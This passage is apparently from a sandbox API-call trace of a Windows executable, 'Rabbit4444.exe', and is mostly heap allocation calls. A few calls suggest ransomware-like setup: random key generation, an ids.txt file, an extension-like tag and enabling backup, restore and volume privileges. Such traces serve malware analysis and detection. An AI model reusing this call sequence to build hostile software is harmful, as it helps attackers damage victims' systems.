Flags=0x8, Size=0xe) returned 0xfcfd8 [0035.041] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc1) returned 0xf2838 [0035.041] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x3e) returned 0xf2298 [0035.041] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x1b) returned 0xeaf60 [0035.041] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x1d) returned 0xead80 [0035.041] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x48) returned 0xf2968 [0035.041] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x12) returned 0xf6848 [0035.041] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x18) returned 0xf6a48 [0035.041] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x1b) returned 0xff748 [0035.041] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x24) returned 0xf56f0 [0035.041] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x29) returned 0xf7760 [0035.041] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x1e) returned 0xff540 [0035.041] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6b) returned 0xee1b0 [0035.041] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x17) returned 0xf69a8 [0035.041] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xf) returned 0xfd1d0 [0035.041] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x16) returned 0xf67a8 [0035.041] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x28) returned 0xf5750 [0035.041] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x27) returned 0xf56c0 [0035.041] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x12) returned 0xf6a88 [0035.041] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x21) returned 0xf5480 [0035.041] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x10) returned 0xfd230 [0035.041] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x1c) returned 0xff7c0 [0035.041] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x12) returned 0xf6868 [0035.041] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xffe08 | out: hHeap=0xe0000) returned 1 [0035.041] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x800) returned 0xffb38 [0035.041] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0035.042] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13e20a6) returned 0x0 [0035.042] GetStartupInfoW (in: lpStartupInfo=0x6ff7f4 | out: lpStartupInfo=0x6ff7f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\FD1HVy\\Desktop\\Rabbit4444.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0035.042] GetCommandLineW () returned="\"C:\\Users\\FD1HVy\\Desktop\\Rabbit4444.exe\" " [0035.042] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\FD1HVy\\Desktop\\Rabbit4444.exe\" ", pNumArgs=0x6fdb90 | out: pNumArgs=0x6fdb90) returned 0xee7d0*="C:\\Users\\FD1HVy\\Desktop\\Rabbit4444.exe" [0035.042] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x5e0) returned 0x100788 [0035.042] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x5e0) returned 0x100d70 [0035.042] lstrlenW (lpString="C:\\Users\\FD1HVy\\Desktop\\Rabbit4444.exe") returned 38 [0035.042] lstrcatW (in: lpString1="", lpString2="Rabbit4444.exe" | out: lpString1="Rabbit4444.exe") returned="Rabbit4444.exe" [0035.042] lstrcpynW (in: lpString1=0x1413f80, lpString2="C:\\Users\\FD1HVy\\Desktop\\Rabbit4444.exe", iMaxLength=25 | out: lpString1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0035.043] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\Desktop\\", lpString2="ids.txt" | out: lpString1="C:\\Users\\FD1HVy\\Desktop\\ids.txt") returned="C:\\Users\\FD1HVy\\Desktop\\ids.txt" [0035.043] GetComputerNameW (in: lpBuffer=0x140a8c0, nSize=0x6fda08 | out: lpBuffer="NQDPDE", nSize=0x6fda08) returned 1 [0035.229] CryptAcquireContextW (in: phProv=0x6fd6a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x6fd6a0*=0x101e20) returned 1 [0035.595] CryptGenRandom (in: hProv=0x101e20, dwLen=0x80, pbBuffer=0x6fd6bc | out: pbBuffer=0x6fd6bc) returned 1 [0035.595] CryptReleaseContext (hProv=0x101e20, dwFlags=0x0) returned 1 [0035.595] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4) returned 0xf6f00 [0035.595] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x200) returned 0x103368 [0035.595] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x15) returned 0xf69c8 [0035.596] wsprintfW (in: param_1=0x1401640, param_2=".%S" | out: param_1=".BFC0E91B00AE8A0620D3") returned 21 [0035.596] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf69c8 | out: hHeap=0xe0000) returned 1 [0035.596] GetSystemInfo (in: lpSystemInfo=0x14013e0 | out: lpSystemInfo=0x14013e0*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0035.596] GetCurrentProcess () returned 0xffffffff [0035.596] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x6fdb98 | out: TokenHandle=0x6fdb98*=0x1e4) returned 1 [0035.596] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeBackupPrivilege", lpLuid=0x6fda94 | out: lpLuid=0x6fda94*(LowPart=0x11, HighPart=0)) returned 1 [0035.601] AdjustTokenPrivileges (in: TokenHandle=0x1e4, DisableAllPrivileges=0, NewState=0x6fda9c*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0035.601] GetLastError () returned 0x0 [0035.601] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeRestorePrivilege", lpLuid=0x6fda94 | out: lpLuid=0x6fda94*(LowPart=0x12, HighPart=0)) returned 1 [0035.602] AdjustTokenPrivileges (in: TokenHandle=0x1e4, DisableAllPrivileges=0, NewState=0x6fda9c*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0035.602] GetLastError () returned 0x0 [0035.602] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeManageVolumePrivilege", lpLuid=0x6fda94 | out: lpLuid=0x6fda94*(LowPart=0x1c, HighPart=0)) returned 1 [0035.602] AdjustTokenPrivileges (in: TokenHandle=0x1e4, DisableAllPrivileges=0, NewState=0x6fda9c*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0035.602] GetLastError () returned 0x0 [0035.602] lstrcatA (in: lpString1="", lpString2="local" | out: lpString1="local") returned="local" [0035.603] lstrcatA (in: lpString1="", lpString2="network" | out: lpString1="network") returned="network" [0035.603] GetSystemTime (in: lpSystemTime=0x100c74 | out: lpSystemTime=0x100c74*(wYear=0x7e3, wMonth=0x7, wDayOfWeek=0x1, wDay=0x16, wHour=0x6, wMinute=0x1, wSecond=0xe, wMilliseconds=0xf5)) [0035.603] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4) returned 0xf6f50 [0035.603] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0035.604] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101738 [0035.604] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101f30 [0035.604] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0035.604] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0xee568 [0035.604] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0035.604] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0xf1918 [0035.604] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x108) returned 0xe6ed8 [0035.604] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x4) returned 0xf6f70 [0035.604] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0xf12e0 [0035.604] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.604] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0xf10b8 [0035.604] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0035.604] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x10c) returned 0x103778 [0035.604] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.604] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103b00 [0035.604] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0xf11c8 [0035.604] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0035.604] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x103890 [0035.604] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf11c8 | out: hHeap=0xe0000) returned 1 [0035.604] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0x105230 [0035.604] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0xc) returned 0x103d10 [0035.604] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.605] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x105230 | out: hHeap=0xe0000) returned 1 [0035.605] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x88) returned 0xf11c8 [0035.605] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103d10 | out: hHeap=0xe0000) returned 1 [0035.605] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1055e8 [0035.605] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf11c8 | out: hHeap=0xe0000) returned 1 [0035.605] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.605] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.605] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.605] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.605] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.605] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.605] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.605] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.605] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.605] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.605] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.605] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.605] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.605] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.605] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.605] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.605] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.605] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.605] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.605] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.605] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.605] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.605] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.605] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.605] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.605] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.605] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.605] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.605] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.605] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.605] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.605] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.605] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.605] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.606] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.606] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.607] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.607] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.607] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.607] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.607] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.607] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.607] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.607] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.607] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.607] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.607] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.607] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.607] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.607] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.607] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.607] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.607] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.607] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.607] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.607] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.607] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.607] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.607] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.607] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.607] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.607] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.607] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.607] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.607] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.607] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.607] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.607] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.607] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.607] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.607] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.607] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.607] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.607] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.607] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.607] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.608] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x8) returned 0xf6f70 [0035.608] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6f70 | out: hHeap=0xe0000) returned 1 [0035.608] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf10b8 | out: hHeap=0xe0000) returned 1 [0035.608] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103890 | out: hHeap=0xe0000) returned 1 [0035.608] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103778 | out: hHeap=0xe0000) returned 1 [0035.608] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1055e8 | out: hHeap=0xe0000) returned 1 [0035.608] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x103b00 | out: hHeap=0xe0000) returned 1 [0035.608] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x103f58 [0035.608] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0xefd18 [0035.608] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0xef950 [0035.608] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0xef160 [0035.608] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0xf1e00 [0035.608] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0xefb28 [0035.608] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0xf10b8 [0035.608] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0xf1148 [0035.608] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0xf11d8 [0035.608] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x103778 [0035.608] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x103808 [0035.608] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x103898 [0035.608] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x103928 [0035.608] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1055e8 [0035.608] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105b20 [0035.608] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106150 [0035.608] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1060c0 [0035.608] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105970 [0035.608] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105730 [0035.608] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1061e0 [0035.608] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106540 [0035.608] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1057c0 [0035.608] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105fa0 [0035.608] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105df0 [0035.608] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x105850 [0035.608] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106390 [0035.608] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x106030 [0035.608] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1056a0 [0035.608] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x84) returned 0x1058e0 [0035.609] 